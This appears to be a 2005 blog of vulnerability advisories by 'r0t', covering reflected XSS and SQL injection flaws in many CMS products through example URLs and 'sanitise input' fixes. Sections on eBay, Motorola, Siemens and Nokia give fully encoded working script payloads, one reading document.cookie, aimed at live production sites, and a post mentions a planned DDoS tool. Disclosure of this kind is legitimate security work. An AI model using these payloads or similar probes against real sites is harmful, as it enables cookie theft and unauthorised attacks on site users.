    SiteSage provides a completely non-technical web content management system for the creation and administration of your web site. Features include; built in Templates and Themes, Font Style Editor, WYSIWYG Content Editor, Message Boards, Mailing Lists, Sign up Forms, Banner Ad Manager, Dynamic Content Rotation, and much more. SiteSage is a complete ASP application for installation on your (or your hosting firm's) MS IIS web server. SiteSage is entirely server based permitting updates to a website to be made from work, home, or anywhere. SiteSage can be completely installed to your web server using standard FTP access. The Lite Edition is free for both commercial and non-commercial use.


    Vuln. Description:

    SiteSage contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "norelay_highlight_words" parameter when performing a search isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Sitekit CMS multiple XSS vuln.

    Sitekit CMS multiple XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vednor:http://www.sitekit.net/
    affected version:v6.6 and prior

    Product Description:

    Sitekit CMS v6.6 enables non-technical business users to manage every aspect of their website with ease. Providining a fully supported, secure and managed service, Sitekit Content Management System Technology together with our UK wide Partner Network is your assurance of web excellence. Sitekit CMS has a comprehensive range of web management features such as E-Marketing, E-Business and Asset Managers, each designed to give you the power of the web at your finnger tips. No fuss. No headaches. Just seamless performance. With four full product launches per year, Sitekit Solutions are relentless in providing the latest business benefits. * Top Search Engine Rankings * Leading Accessibility (Bobby AAA, W3C) * Ease of use * Strong Return on Investment * Flexible solution that can be scaled in size and function * Seamless intergration with IT systems

    Vuln. Description:

    Sitekit CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "textonly" and "locID" "lang" "ClickFrom" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    examples:

    /default.aspx?[xss]
    /Default.aspx?textonly=[xss]
    /Default.aspx?textonly=1&locID=[xss]
    /Default.aspx?textonly=1&locID=0ad00v005&lang=[xss]
    /Request-call-back.html?ClickFrom=[xss]
    /registration-form.html?ClickFrom=[xss]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    SCOOP! Multiple XSS vuln.

    SCOOP! Multiple XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://scoop.cim.com.au/
    affected version:2.3 and prior


    Product Description:

    SCOOP! is the innovative Australian web content management system that will change the way we see and manage the content of our web sites. The SCOOP! web content management system allows web site managers and owners to publish and manage web site content without any HTML or web scripting knowledge. SCOOP! employs browser based editing of web content and template management. Content managers rather than programmers or IT departments, can publish text and images through an intuitive browser based interface, from anywhere, anytime.

    Vuln. Description:

    SCOOP!contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "keywords" and "username" "area" "articleZoneID" "r" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    +

    attacker can chose wich parameters whe want to show/give to his target, using "category.asp" "articleZone.asp" "account_login.asp" "lostPassword.asp" "articleSearch.asp", because in those scripts paramters isnt filtred,see examples below:

    examples:


    /articleSearch.asp?keywords=[XSS]

    /lostPassword.asp?username=[XSS]

    /account_login.asp?Username=[XSS]

    /account_login.asp?Password=[XSS]

    /category.asp?area=[XSS]

    /category.asp?area=support&articleZoneID=[XSS]

    /category.asp?area=support&articleZoneID=132&r=[XSS]


    You can change to any paremters you want where script use some parameters:)

    /category.asp?pridels_Crew_XSS_r0t=[XSS]

    /articleZone.asp?r0t_r0t_r0t_r0t_r0t=[XSS]

    /account_login.asp?r0t_like_THIS=[XSS]

    /lostPassword.asp?GIVE_TO_r0t_ADMIN_PWD=[XSS]

    /articleSearch.asp?FIND_SCOOP!_BEST_CODERS=[XSS]

    /prePurchaserRegistration.asp?isn't_lame_2_purchase?=[XSS]

    /requestDemo.asp?_whata_*faq*?=[XSS]


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Scoop XSS vuln.

    Scoop XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://scoop.kuro5hin.org/
    affected version: 1.1 RC1 and prior

    Product Description:

    Scoop is a "collaborative media application". It falls somewhere between a content management system, a web bulletin board system, and a weblog. Scoop is designed to enable your website to become a community. It empowers your visitors to be the producers of the site, contributing news and discussion, and making sure that the signal remains high.

    A scoop site can be run almost entirely by the readers. The whole life-cycle of content is reader-driven. They submit news, they choose what to post, and they can discuss what they post. Readers can rate other readers comments, as well, providing a collaborative filtering tool to let the best contributions float to the top. Based on this rating, you can also reward consistently good contributors with greater power to review potentially untrusted content. The real power of Scoop is that it is almost totally collaborative.

    Of course, as an admin, you also may pick and choose which tools you want the community to have, and which will be available to admins only. Administrators have a very wide range of customization and security management tools available. All of the administration of Scoop is done through the normal web interface. Scoop will seamlessly provide more options to site administrators, right in the normal site, so the tools you need are always right where you need them.



    Vuln. Description:

    Scoop contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "type" and "count" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:

    /?op=search&offset=0&old_count=30&type=[XSS]

    /?op=search&offset=0&old_count=30&type=story
    &topic=§ion=&string=r0t&count=1[XSS]



    /story/2005/11/4/184932/452[XSS]
    /story/2005/11/4/184932[XSS]
    /story/2005/11/4[XSS]
    /story/2005/11[XSS]
    /story/2005[XSS]
    /story/[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Redakto WCMS multiple XSS vuln.

    Redakto WCMS multiple XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://computeroil.com/
    affected version:3.2 and prior

    Product Description:

    With our Content Management System Redakto, you and your team, can easily maintain, organize anddesign your web presentation. No coding skills or alike are needed to get you up and running.Still you will get all the flexibility to adjust your website to your needs.
    Within minutes you will be able to start filling your content, insert images, documents, importyour Word/Excel Files, generate multilingual websites and much more. Redakto offers you aintuitive and easy to use User interface and can be used with every browser.


    Vuln. Description:

    Redakto WCMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "iid/iid2" "lang" "r" "cart" "str" "nf" "a" and search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:


    /index.tpl?iid=[XSS]

    /index.tpl?iid=l3a1b3&lang=[XSS]

    /index.tpl?iid=l3a1b3&lang=1&iid2=[XSS]

    /index.tpl?iid=l3a1b3&lang=1&iid2=3&r=[XSS]

    /index.tpl?iid=l093a1b1&lang=1&iid2=[iid2]&r=
    [r]&cart=[XSS]

    /index.tpl?iid=l093a1b1&lang=1&iid2=[iid2]&r=
    [r]&cart=11351542306899006&str=[XSS]

    /index.tpl?a=search_adv&cart=113515443393191
    01&lang=1&iid=13&nf=[XSS]

    /index.tpl?a=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    RAMSite R|1 CMS XSS vuln.

    RAMSite R|1 CMS XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://ramsiter1.imikalsen.com/
    affected version:1.0 and prior

    Product Description:

    The RAMSite R|1 CMS is an advanced, yet easy to use and lightweight, complete web-publishing solution. It is filled with useful and interesting features, and is built upon an architecture specifically designed to allow impressive development cycles for additional modules.

    Vuln. Description:

    RAMSite R|1 CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    ProjectApp mutliple XSS vuln.

    ProjectApp mutliple XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:www.aspapp.com/content.asp?contentid=323
    affected version:v3.3 and prior

    Product Description:

    ProjectApp is a customizable groupware solution that provides a suite of project and task management tools to foster team communication. Track projects and tasks, share and distribute centralized docs and knowledge.

    Vuln. Description:

    ProjectApp contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "keywords" "projectid" "ret_page" "skin_number" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:

    /forums.asp?keywords=[XSS]
    /search_employees.asp?keywords=[XSS]
    /cat.asp?keywords=[XSS]
    /links.asp?keywords=[XSS]
    /pmprojects.asp?projectid=[XSS]
    /login.asp?ret_page=[XSS]
    /default.asp?skin_number=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    IntranetApp XSS vuln.

    IntranetApp XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:www.aspapp.com/content.asp?contentid=322
    affected version:3.3 and prior

    Product Description:

    IntranetApp gets groups on the same page with tools to enhance collaboration and communication. With this pre-built application you can create and manage company employees, news, events, projects, tasks, Web resources, documents and discussion forums. IntranetApp is completely Web based and customizable. Full source code (standard .asp) included.

    Vuln. Description:

    IntranetApp contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "ret_page" paremter in "login.asp" and "do_search" "search" in "content.asp" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

    /login.asp?ret_page=[XSS]

    /content.asp?CatId=&ContentType=
    &keywords=r0t&search=%3E&do_search=[XSS]

    /content.asp?CatId=&ContentType=&
    keywords=r0t&search=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    SiteEnable XSS vuln.

    SiteEnable XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.siteenable.com/
    affected version:3.3 and prior

    Product Description:

    SiteEnable is an open source Web application that combines content management and collaboration tools. It falls somewhere between a portal, content management system, a web bulletin board system and a collaborative application. SiteEnable is an instant website that is skinnable and standards-based. SiteEnable enables you or staff to easily update content -- whereever and whenever you need. SiteEnable can be used as a content management system, business Website, collaboration tool, community, project management tool and other content-centric Web-based initiatives.

    Vuln. Description:

    SiteEnable contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "ret_page" paremter in "login.asp" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:


    /login.asp?ret_page=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    PortalApp XSS vuln.

    PortalApp XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.portalapp.com/
    affected version:3.3 and prior


    Product Description:

    PortalApp is an open source Web application that combines content management with e-commerce and collaboration. It falls somewhere between a portal, content management system, a web bulletin board system, storefront and a collaborative application. PortalApp is an instant website that is skinnable and standards-based. PortalApp is designed to enable your address 90% of the functionality that most Websites require. It enables you to sell on-line, manage members, and easily update content -- whereever and whenever you need. PortalApp can be used as a content management system, business Website, collaboration tool, community, project management tool and other content-centric Web-based initiatives.


    Vuln. Description:

    PortalApp contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "ret_page" paremter in "login.asp" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

    /login.asp?ret_page=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Polopoly XSS vuln.

    Polopoly XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.polopoly.com/
    affected version:9 and prior

    Product Description:

    Polopoly is 100% Java since 1996 and embraces standards and open architecture. The system is browser independent, DB independent, and platform independent. The system thrives in high traffic, personalized web environments.

    Vuln. Description:

    Polopoly contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Plexcor's® CMS XSS vuln.

    Plexcor's® CMS XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.plexcor.com/
    affected version: 4.0 and prior

    Product Description:

    Integrated modular content, communications, calendar, commerce, customer and project management solution


    Vuln. Description:

    Plexcor contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    phpSlash SQL vuln.

    phpSlash SQL vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.php-slash.org/
    affected version:0.8.1 and prior

    Product Description:

    phpSlash is a CMS that provides an easy and flexible means to publish websites.ddd It currently boasts full HTML templates, an OO design, the ability to operate in a hosted environment, and a bunch of other goodies..d

    Vuln. Description:

    phpSlash contains a flaw that allows a remote sql injection attacks.Input passed to the "story_id" parameter in "article.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

    example:

    /article.php?story_id=1[SQL]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Papoo Multiple SQL vuln.

    Papoo Multiple SQL vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.papoo.org/
    affected version:2.1.2 and prior

    Product Description:

    Papoo ist an easy to use, accessible CMS. It respects for Frontend and Administration the rules of the WCAG and ATAG. Papoo is Open Source.

    Vuln. Description:

    Papoo contains a flaw that allows a remote sql injection attacks.Input passed to the "menuid" parameter in "index.php" "guestbook.php" and "forumid" "reporeid_print" parameter in "print.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

    examples:

    /index.php?menuid=[SQL]
    /guestbook.php?menuid=[SQL]
    /print.php?reporeid_print=&forumid=[SQL]
    /print.php?reporeid_print=[SQL]


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    papaya CMS XSS vuln.

    papaya CMS XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.papaya-cms.com/
    affected version: 4.0.4 and prior

    Product Description:

    papaya CMS content management system and framework was designed for individual, mid-sized and enterprise wide deployments. The papaya CMS meets large-scaled project requirements and offers extremely short implementation times. Since 2001, papaya CMS has been deployed at high profile customers such as AGOF (members include: AOL, GMX, Bauer, Gruner & Jahr, Web.de, Yahoo Inc., Lycos Inc. etc.), DHL and the Handelsblatt publishing group. papaya is based on proven OpenSource technologies as PHP, XSLT/XML and supports RDBS (e.g. MySQL and PostgreSQL). papaya is OpenSource software (under GPL-license) since 2005. papaya Software GmbH delivers website creation and custom application development. More information: www.papaya-cms.com PLEASE NOTE: The website is only available in german until mid of June, 2005. The GUI and the documentation is already available in english. In the meantime, feel free to check http://www.lamparea.org/papaya_software.28.html for a short description or to contact the maintainer of this project for further information.

    Vuln. Description:

    papaya CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "bab[searchfor]" paremter isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

    /suche.153.html?bab[page]=6&bab[searchfor]=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    HOW secure is ebay.com?

    You will see how secure after checking live example below:)

    http://search.ebay.com/search/search.dll?
    sofocus=bs&sbrftog=1&fcl=4&from=R10&catref
    =C12&satitle=fur+trim*&sacat=63862%26catref
    %3DC6&bs=Search&fsop=1%26fsoo%3D1&fgtp=&a54=
    -24%3Cscript%3Ealert()%3C/script%3E&a22868=-
    24&a94=-24&gcs=1110&pfid=1283&reqtype=1&pfmode=
    1&alist=a54%2Ca55%2Ca22868%2Ca53%2Ca94%2Ca3801
    &pf_query=fur+trim*&sargn=-1%26saslc%3D2&sadis
    =200&fpos=94062&sappl=1&ftrt=1&ftrv=1&sabdlo=
    &sabdhi=&saprclo=%22%3E%3Cscript%3Ealert(5)
    %3C/script%3E&saprchi='%22%3E%3Cscript%3Ealert
    (document.cookie)%3C/script%3E

    i forgot SonyEricsson made also good phones

    I forget about those great phones that develop SonyEricsson

    manually:

    http://www.sonyericsson.com/spg.jsp?cc
    =be&lc=nl&ver=4000&template=ph1_3&zone=ps

    in search field enter: [XSS]

    SAGEM made phones:)

    I dont know many phone companys next wich i did remember was sagem, so here you got, they lammer work!

    manualy use:
    http://www.sagem-online.com/isa-b2c/b2c/accountForward.do

    in email field put: [XSS]

    Motorola isn't better:)

    This case isnt similar to others, but anyway vuln.
    in this case they chosed for they shop using digitalriver service:)

    http://motorola.digitalriver.com/servlet/
    ControllerServlet?Action=DisplayHomeMotostor
    ShopPage&SiteID=motostor&Locale=en_US&Env=
    %22%3E%3Cscript%3Ealert('Motorola,%20r0t%20
    like%20some%20phones%20,%20but%20not%20your
    %20coders,%20your%20coders%20suck!')%3C/script%3E

    http://motorola.digitalriver.com/servlet/Contro
    llerServlet?Action=DisplayHomeMotostorShopPage
    &SiteID=motostor&Locale=%22%3E%3Cscript%3Ealert
    ('Motorola,%20r0t%20like%20some%20phones%20,%20
    but%20not%20your%20coders,%20your%20coders%20suck
    !')%3C/script%3E

    Siemens XSS or they have good phones,but no coders:)

    http://siemens.com/index.jsp?sdc_ggid=
    &sdc_tabidx=&sdc_countryid=0&sdc_flags=
    0&sdc_pnid=0&sdc_zoneid=1&sdc_langid=1
    &sdc_sectionid=0&sdc_contentid=255&sdc_
    linkid=1327885&sdc_sid=33514031252&sdc_
    rh=&sdc_bcpath=%22%3E%3Cscript%3Ealert
    ('r0t%20loves%20siemens%20phones,but%20
    coders%20as%20always%20sucks!')%3C/scri
    pt%3E

    http://siemens.com/index.jsp?sdc_ggid=&s
    dc_tabidx=&sdc_countryid=0&sdc_flags=0&s
    dc_pnid=0&sdc_zoneid=1&sdc_langid=1&sdc_
    sectionid=0&sdc_contentid=%22%3E%3Cscript
    %3Ealert('r0t%20loves%20siemens%20phones,
    but%20coders%20as%20always%20sucks!')%3C/
    script%3E

    Solution:

    Get better coders!



    PS. coders from siemens... lammers!

    NOKIA XSS or r0t loves noki

    http://www.nokia.com/search/index.jsp?wsid=
    8&qt=&charset=%22%3E%3Cscript%3Ealert('r0t%20loves%
    20nokia%20phones,%20but%20coders%20sucks!')%3C/script%3E

    solution:
    Get better coders!

    OpenEdit XSS vuln.

    OpenEdit XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.openedit.org
    affected version:4.0 and prior

    Product Description:

    Developed in partnership with Web designers, OpenEdit offers a host of popular features. It includes easy online editing, sophisticated eCommerce, corporate blogging and dynamic layouts in an open source environment for flexible, advanced website development. OpenEdit President Christopher Burkey and a core team of expert Java architects have created OpenEdit by combining the best of existing Java frameworks.

    Vuln. Description:

    OpenEdit contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "page" "oe-action" paremters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:
    /store/search/results.html?query=&department=&oe-action=[XSS]
    /store/search/results.html?page=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Tuesday, December 20, 2005

    OpenCms XSS vuln.

    OpenCms XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.opencms.org/
    affected version:6.0.3 and prior

    Product Description:

    OpenCms is a professional level Open Source Website Content Management System. OpenCms helps to create and manage complex websites easily without knowledge of html. An integrated WYSIWYG editor with a user interface similar to well known office applications helps the user creating the contents, while a sophisticated template engine enforces a site-wide corporate layout. As true Open Source software, OpenCms is completely free of licensing costs. OpenCms is based on Java and XML technology. Therefore it fits perfectly into almost any existing modern IT infrastructure. OpenCms runs in a "full open source" environment (e.g. Linux, Apache, Tomcat, MySQL) as well as on commercial components (e.g. Windows NT, IIS, BEA Weblogic, Oracle DB).

    Vuln. Description:

    OpenCms contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Monday, December 19, 2005

    about our site and board.

    I decided our we decided that our site and board will re-launch at 2006 year 1 january !
    Cauz, no i our other team members have enough time to manage it, site and board is working also now but its isnt public.
    Board is only working cauz there is alot of people who share they private advisories and exploits wich will be only later public or will be never public.
    Also i hope soon cembo will release public "Alberts" DDOS attack tool .
    So, as you can imagine we have alot to do , but not enough time for everything .
    Still we need spanish and german help for board, board will be on English(main) and Latvian,Russian,Spanish (i hope),German(i hope).Other languages and specialist are also welcome.
    I know that many previous members can´t wait to join community board, but sorry everything is in maintance and we will back only on 2006 year :)

    NQcontent V3 XSS vuln.

    NQcontent V3 XSS vuln.

    Vuln. discovered by : r0t
    Date: 19 dec. 2005
    vendor:http://www.nqcontent.com/
    affected version:V3 Professional Edition,V3 Enterprise Edition,V3 Comparison Matrix.

    Product Description:

    NQcontent is a dynamic web content management system that extends traditional CMS capabilities to include a powerful application development and integration framework. NQcontent will revolutionise the speed and ease of delivery of your internet, intranet, extranet and portals, seamlessly integrating and future proofing your online investment.



    Vuln. Description:

    NQcontent contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    MMBase XSS vuln.

    MMBase XSS vuln.

    Vuln. discovered by : r0t
    Date: 19 dec. 2005
    vendor:http://www.mmbase.org/
    affected version: 1.7.4 and prior


    Product Description:

    Open source object oriented Java based enterprise content management system. Platform independent, all major operating systems (Windows, Unix, Linux), databases (Oracle, DB2, Informix, MSSQL, MySQL, PostgreSQL) servlet containers (Tomcat, Orion, and J2EE application servers like JBoss, Jonas, IBM Websphere, BEA weblogic).


    Vuln. Description:

    MMBase contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Miraserver SQL vuln.

    Miraserver SQL vuln.

    Vuln. discovered by : r0t
    Date: 19 dec. 2005
    vendor:http://www.miraserver.com
    affected version: Miraserver v.1.0 RC4 and prior


    Product Description:

    MiraServer is a content management system aimed to ease the task of web content delivery and management for large content portals, but has the flexibility to handle smaller sites as well. It can handle web pages, articles, news headlines and FAQs. Among its features are WYSIWYG editing, integrated user comment system, optional vBulletin integration, full template-control system, file attachments and much more.



    Vuln. Description:


    Miraserver contains a flaw that allows a remote sql injection attacks.Input passed to the "page" parameter in "index.php" and "id" parameter in "newsitem.php" and "cat" parameter in "article.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

    examples:

    /index.php?page=[SQL]
    /newsitem.php?id=[SQL]
    /article.php?cat=[SQL]


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Sunday, December 18, 2005

    Mercury CMS™ vuln.

    Mercury CMS™ vuln.

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://www.mercury-cms.com
    affected version:4.0 and prior


    Product Description:

    Mercury CMS™ v4.0 is an extensible, modular, enterprise-level content management system at entry-level costs. The four Editions of the CMS - Lite, Professional, Portal and E-Commerce - provide complete set of functionality to satisfy the business needs of our clients. Mercury CMS™ allows non-technical personnel to manage and edit content using secure and easy to use, browser-based interfaces.
    We designed the Mercury CMS™ v4.0 to provide maximum aesthetic flexibility by utilizing custom templates and multi-level styling. What makes this CMS unique are features like parallel editing, content granulation where pages are containers and content is organized in sections, snippets, modules; site is organized in areas (public, intranet, extranet, hidden); meta tags, styles, and repeating content are configured on multiple levels (global, area, page); and more.
    Flexible extensibility provides secure integration with third party and custom applications.
    The Architecture of Mercury CMS™ v4.0 allows for the inclusion of additional modules and technologies as you require them. There are more than 40 modules currently available for the system and this number constantly grows. We give you 17 of those modules for free to get you started fast and at very low cost.

    Vuln. Description:

    SQL.
    Mercury CMS™ contains a flaw that allows a remote sql injection attacks.Input passed to the "page" parameter in "index.cfm" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code


    /index.cfm?page=[SQL]


    XSS.
    Mercury CMS™ contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "content" "criteria" paremters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    /index.cfm?page=40&criteria
    =&start=11&title=&content=[XSS]

    /index.cfm?restricted=false&page=10&criteria=[XSS]



    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Marwel SQL inj.

    Marwel SQL inj.

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:www.qcm.cz
    affected version:2.7 and prior

    Vuln. Description:

    Marwel contains a flaw that allows a remote sql injection attacks.Input passed to the "show" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

    /index.php?show=[SQL]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Magnolia XSS vuln.

    Magnolia XSS vuln.

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://www.magnolia.info
    affected version:2.1 and prior

    Product Description:

    Magnolia is the free, open source, J2EE deployable content management system (CMS) developed by obinary. Magnolia is written in Java and uses the upcoming standard API for Java-based content repositories (JCR) to access its content. It has an easy to use web-browser interface, a clear API and a useful custom tag library for easy templating in JSP and Servlets.
    Magnolia is the first open-source content-management-system (CMS) which has been built from scratch to support the upcoming standard API for java content repositories (JCR).
    Its main goal is ease of use for all parties involved in running a CMS.
    Magnolia is distributed as a double-clickable binary installer. It includes everything you need to get you started with a standalone installation in less than 10 minutes. Magnolia runs on all common operating-systems (JDK 1.4.1 or later required). No additional software or databases are needed.
    Magnolia Content Management features a very flexible structure, platform-independence through the use of Java and XML, a simple to use API, easy templating through the use of JSP, JSTL and a custom tag library, automatic administrative UI generation, transparent and uniform data access to multiple data repositories, easy configuration through XML, easy application integration and easy deployment with professional staging on any J2EE Server.
    Magnolia is actively being developed by obinary. It is available free of charge as an open source product. We provide a binary download based on tomcat for easy deployment on Mac OS X, Windows, Linux and Solaris.


    Vuln. Description:

    Magnolia contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "query" paremter isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

    /search.html?query=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Lutece XSS vuln.

    Lutece XSS vuln.

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://lutece.paris.fr
    affected version:1.2.3 and prior

    Product Description:

    Lutece is a web portal engine that lets you quickly create internet or intranet dynamic sites based on HTML, XML or database contents. This Open Source software is written in Java and mainly based on Apache Software Foundation (Jakarta and XML projects). Lutece runs as well under Linux or Windows platforms. The default database is MySQL. Lutece provides a very simple administration interface that can be used directly by end users without any technical skills. Lutece is free software, distributed under a BSD like license.

    Vuln. Description:

    Lutece contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Lighthouse CMS XSS vuln.

    Lighthouse CMS XSS vuln.

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://www.lighthouse-cms.de/en/
    affected version:1.1.0 and prior


    Product Description:

    Lighthouse is a modern, user friendly, high performance Content Management System. Lighthouse lets you create and manage web applications intuitively.
    Lighthouse allows you easy access and effective management of your web presence. Lighthouse enables you to put Enterprise Content Management to use for your business. With its modular structure, it offers you exactly the features you need, saving you time and money.
    Lighthouse is at home on all major platforms and can be used with a wide range of databases.

    Vuln. Description:

    Lighthouse contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "search" paremter isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    /?search=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Liferay Portal Enterprise 3.6.1 XSS

    Liferay Portal Enterprise 3.6.1 XSS

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://liferay.com/
    affected version:3.6.1 and prior

    Product Description:

    One of the leading open-source portal servers with a flexible, business-friendly license, Liferay is truly open source and doesn't lock you in to a specific vendor's database or application server. We also have a dedicated team of developers and consultants to complement our product with support, training, and professional services. We are one of the most mature products in the portal space and have complemented our existing CMS functionality with a slew of new features in version 3.6.1 that make integration of portal and CMS applications easier than ever. Liferay Portal ships with more portlets out of the box than any other portal platform. It can be run on a servlet container or a full-blown J2EE application server.

    Vuln. Description:

